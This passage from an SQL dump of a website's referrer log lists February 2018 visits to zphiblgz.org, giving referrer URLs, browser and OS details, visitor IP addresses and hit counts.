Unknown','Unknown','Unknown','','173.252.124.78','000',2,0),(21015,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.115','000',2,0),(21016,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.207','000',5,0),(21017,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.102','000',2,0),(21018,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',1,0),(21019,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',1,0),(21020,'2018-02-11','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.32','000',1,0),(21021,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.114','000',3,0),(21022,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',1,0),(21023,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',1,0),(21024,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',1,0),(21025,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.117','000',2,0),(21026,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.192','000',6,0),(21027,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.91','000',1,0),(21028,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.71','000',2,0),(21029,'2018-02-11','http://r.search.yahoo.com/_ylt=AwrBT_s01IBaxoEA2k9x.9w4;_ylu=X3oDMTEyaXBnYWNoBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjUyODRfMQRzZWMDc3I-/RV=2/RE=1518421172/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=FqQhgm8gPXhYS7lRKvxa9RcIS.I-','Safari','iPhone','11.0','','100.36.84.244','000',2,0),(21030,'2018-02-11','https://zphiblgz.org','Firefox','Windows','40.1','','62.1.20.121','000',2,0),(21031,'2018-02-11','https://zphiblgz.org','Chrome','Windows','51.0.2704.103','','195.211.23.222','000',1,0),(21032,'2018-02-11','https://zphiblgz.org','Chrome','Windows','51.0.2704.103','','195.211.23.209','000',1,0),(21033,'2018-02-11','https://zphiblgz.org','Chrome','Windows','51.0.2704.103','','195.211.23.211','000',1,0),(21034,'2018-02-11','https://zphiblgz.org','Chrome','Windows','51.0.2704.103','','195.211.23.224','000',1,0),(21035,'2018-02-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(21036,'2018-02-11','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(21037,'2018-02-11','https://zphiblgz.org','Firefox','Windows','40.1','','41.107.33.64','000',2,0),(21038,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.78.110.124','000',2,0),(21039,'2018-02-11','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.28','000',1,0),(21040,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.230','000',1,0),(21041,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.90','000',1,0),(21042,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.138','000',1,0),(21043,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.129','000',1,0),(21044,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.142','000',2,0),(21045,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.54','000',1,0),(21046,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.117','000',1,0),(21047,'2018-02-11','https://zphiblgz.org','Firefox','Windows','40.1','','31.6.129.166','000',2,0),(21048,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.130','000',1,0),(21049,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.182','000',1,0),(21050,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.128','000',2,0),(21051,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.181','000',1,0),(21052,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.59','000',2,0),(21053,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',1,0),(21054,'2018-02-11','https://mamasuper.prom.ua/','MSIE','Windows','6.0','','46.118.116.121','000',5,0),(21055,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.125','000',1,0),(21056,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',2,0),(21057,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.42','000',1,0),(21058,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',1,0),(21059,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.116','000',1,0),(21060,'2018-02-11','https://www.google.com/','Safari','iPad','9.0','','73.135.137.209','000',1,0),(21061,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.201','000',1,0),(21062,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.193','000',1,0),(21063,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.116','000',2,0),(21064,'2018-02-11','https://buypuppies.ca/','MSIE','Windows','6.0','','46.119.123.218','000',3,0),(21065,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.140','000',1,0),(21066,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.123','000',1,0),(21067,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.151','000',1,0),(21068,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.165','000',1,0),(21069,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.152','000',1,0),(21070,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.208','000',3,0),(21071,'2018-02-11','http://strady.org.ua/','MSIE','Windows','6.0','','46.211.13.134','000',3,0),(21072,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.23','000',2,0),(21073,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.165','000',1,0),(21074,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.114','000',2,0),(21075,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.149','000',2,0),(21076,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(21077,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.51','000',4,0),(21078,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.67','000',2,0),(21079,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.80','000',1,0),(21080,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.114','000',1,0),(21081,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.115','000',2,0),(21082,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',2,0),(21083,'2018-02-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(21084,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.76','000',1,0),(21085,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.209','000',1,0),(21086,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',2,0),(21087,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',1,0),(21088,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.10','000',1,0),(21089,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.233','000',3,0),(21090,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.36','000',1,0),(21091,'2018-02-11','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.29','000',1,0),(21092,'2018-02-11','https://zphiblgz.org','Safari','iPhone','11.0','','76.100.1.78','000',5,0),(21093,'2018-02-11','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','45.77.87.233','000',2,0),(21094,'2018-02-11','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(21095,'2018-02-11','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','81.2.195.240','000',2,0),(21096,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.64','000',3,0),(21097,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.213','000',1,0),(21098,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.194','000',1,0),(21099,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.148','000',1,0),(21100,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.211','000',2,0),(21101,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.180','000',3,0),(21102,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.150','000',1,0),(21103,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.204','000',1,0),(21104,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.116','000',1,0),(21105,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.101','000',1,0),(21106,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.137','000',1,0),(21107,'2018-02-11','https://zphiblgz.org','Safari','iPhone','11.0','','71.246.252.73','000',4,0),(21108,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.202','000',2,0),(21109,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.115','000',1,0),(21110,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',2,0),(21111,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',1,0),(21112,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',2,0),(21113,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.101','000',1,0),(21114,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',1,0),(21115,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.74','000',2,0),(21116,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',1,0),(21117,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.239','000',1,0),(21118,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.41','000',1,0),(21119,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.66','000',1,0),(21120,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.233','000',1,0),(21121,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.93.20','000',3,0),(21122,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.245','000',1,0),(21123,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.214','000',1,0),(21124,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.70','000',1,0),(21125,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.251','000',1,0),(21126,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',3,0),(21127,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.195','000',1,0),(21128,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.192','000',1,0),(21129,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.82','000',1,0),(21130,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.12','000',1,0),(21131,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.213','000',2,0),(21132,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',1,0),(21133,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.197','000',2,0),(21134,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',1,0),(21135,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.184','000',1,0),(21136,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(21137,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.212','000',1,0),(21138,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',1,0),(21139,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',2,0),(21140,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.112','000',2,0),(21141,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.107','000',1,0),(21142,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.11','000',1,0),(21143,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.182','000',2,0),(21144,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.151','000',2,0),(21145,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.138','000',1,0),(21146,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.183','000',1,0),(21147,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.135','000',1,0),(21148,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',1,0),(21149,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',1,0),(21150,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',1,0),(21151,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',2,0),(21152,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',1,0),(21153,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.18','000',1,0),(21154,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.86','000',1,0),(21155,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.22','000',2,0),(21156,'2018-02-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',1,0),(21157,'2018-02-11','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.144','000',1,0),(21158,'2018-02-11','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(21159,'2018-02-11','http://zphiblgz.org/scholarship/','Chrome','Linux','41.0.2272.118','','66.102.7.150','000',1,0),(21160,'2018-02-11','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.11.204','000',19,0),(21161,'2018-02-12','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.31','000',2,0),(21162,'2018-02-12','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(21163,'2018-02-12','https://www.google.com/','Safari','iPhone','11.0','','69.40.104.147','000',2,0),(21164,'2018-02-12','https://zphiblgz.org','Chrome','Unknown','64.0.3264.0','','165.227.116.45','000',3,0),(21165,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',2,0),(21166,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',3,0),(21167,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',2,0),(21168,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.226','000',3,0),(21169,'2018-02-12','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.11','000',1,0),(21170,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.76','000',2,0),(21171,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.165','000',1,0),(21172,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.186','000',2,0),(21173,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.240','000',1,0),(21174,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',4,0),(21175,'2018-02-12','https://pills24h.com/buy-levitra-online-without-prescription/','Opera','Windows','8.50','','178.137.162.218','000',2,0),(21176,'2018-02-12','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.234.145','000',2,0),(21177,'2018-02-12','https://zphiblgz.org','Firefox','Linux','21.0','','37.187.56.76','000',44,0),(21178,'2018-02-12','http://zphiblgz.org/','Firefox','Windows','35.0','','188.165.4.128','000',2,0),(21179,'2018-02-12','http://zphiblgz.org','Chrome','Windows','62.0.3202.94','','196.245.186.211','000',4,0),(21180,'2018-02-12','https://zphiblgz.org','Firefox','Windows','40.1','','117.220.250.208','000',2,0),(21181,'2018-02-12','zphiblgz.org','Chrome','Windows','58.0.1145.75','','187.33.5.110','000',2,0),(21182,'2018-02-12','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','205.144.171.133','000',2,0),(21183,'2018-02-12','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','162.241.190.187','000',2,0),(21184,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.197','000',2,0),(21185,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.225','000',1,0),(21186,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',1,0),(21187,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.112','000',1,0),(21188,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',1,0),(21189,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.112','000',3,0),(21190,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',2,0),(21191,'2018-02-12','https://zphiblgz.org','Firefox','Windows','58.0','','100.36.90.41','000',3,0),(21192,'2018-02-12','https://zphiblgz.org','MSIE','Windows','11.0','','162.129.251.42','000',1,0),(21193,'2018-02-12','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',2,0),(21194,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',1,0),(21195,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.18','000',2,0),(21196,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.226','000',2,0),(21197,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',6,0),(21198,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.56','000',1,0),(21199,'2018-02-12','https://zphiblgz.org','Firefox','Macintosh','46.0','','50.225.39.74','000',2,0),(21200,'2018-02-12','https://zphiblgz.org','AppleWebKit','Windows','534','','157.55.39.90','000',1,0),(21201,'2018-02-12','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','173.251.33.91','000',3,0),(21202,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.139','000',4,0),(21203,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.8','000',2,0),(21204,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.22','000',1,0),(21205,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.185','000',1,0),(21206,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.197','000',1,0),(21207,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.69','000',4,0),(21208,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.104','000',1,0),(21209,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.117','000',1,0),(21210,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',1,0),(21211,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.117','000',1,0),(21212,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',3,0),(21213,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',1,0),(21214,'2018-02-12','https://pills24h.com/buy-doxycycline-online-without-prescription/','MSIE','Windows','6.0','','46.118.225.78','000',6,0),(21215,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',1,0),(21216,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.86','000',4,0),(21217,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.16','000',3,0),(21218,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.219','000',2,0),(21219,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.237','000',4,0),(21220,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.114','000',2,0),(21221,'2018-02-12','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.85','000',1,0),(21222,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',1,0),(21223,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',1,0),(21224,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.217','000',1,0),(21225,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.117','000',1,0),(21226,'2018-02-12','https://www.google.com/','Chrome','Windows','64.0.3282.140','','50.225.39.82','000',2,0),(21227,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.27','000',2,0),(21228,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.49','000',2,0),(21229,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.214','000',1,0),(21230,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.213','000',4,0),(21231,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.182','000',1,0),(21232,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.41','000',2,0),(21233,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',1,0),(21234,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.89','000',3,0),(21235,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.164','000',1,0),(21236,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.90','000',1,0),(21237,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.119','000',1,0),(21238,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.203','000',1,0),(21239,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.133','000',3,0),(21240,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.18','000',1,0),(21241,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.55','000',1,0),(21242,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.252','000',1,0),(21243,'2018-02-12','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','71.213.193.228','000',2,0),(21244,'2018-02-12','https://zphiblgz.org','Safari','Macintosh','11.0.1','','192.198.80.227','000',2,0),(21245,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.227','000',1,0),(21246,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',1,0),(21247,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',4,0),(21248,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.28','000',1,0),(21249,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.221','000',2,0),(21250,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.145','000',1,0),(21251,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.181','000',2,0),(21252,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.178','000',1,0),(21253,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.147','000',2,0),(21254,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.100','000',1,0),(21255,'2018-02-12','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(21256,'2018-02-12','https://zphiblgz.org','Chrome','Android','56.0.2924.87','','108.45.119.241','000',2,0),(21257,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.48','000',3,0),(21258,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.199','000',2,0),(21259,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.202','000',1,0),(21260,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.48','000',2,0),(21261,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.115','000',1,0),(21262,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.199','000',1,0),(21263,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.75','000',3,0),(21264,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.86','000',1,0),(21265,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.119','000',2,0),(21266,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.118','000',3,0),(21267,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.31','000',1,0),(21268,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.32','000',1,0),(21269,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.161','000',1,0),(21270,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.131','000',2,0),(21271,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.155','000',2,0),(21272,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.105','000',1,0),(21273,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.5','000',1,0),(21274,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.59','000',1,0),(21275,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.196','000',4,0),(21276,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.143','000',1,0),(21277,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.162','000',1,0),(21278,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.135','000',1,0),(21279,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.136','000',1,0),(21280,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.213','000',2,0),(21281,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.75','000',1,0),(21282,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.86','000',1,0),(21283,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.208','000',1,0),(21284,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.79','000',2,0),(21285,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.91','000',1,0),(21286,'2018-02-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.76','000',1,0),(21287,'2018-02-12','https://zphiblgz.org','Safari','iPhone','9.0','','118.81.1.31','000',1,0),(21288,'2018-02-12','https://zphiblgz.org','Safari','iPhone','9.0','','125.76.60.15','000',1,0),(21289,'2018-02-12','https://zphiblgz.org/','Opera 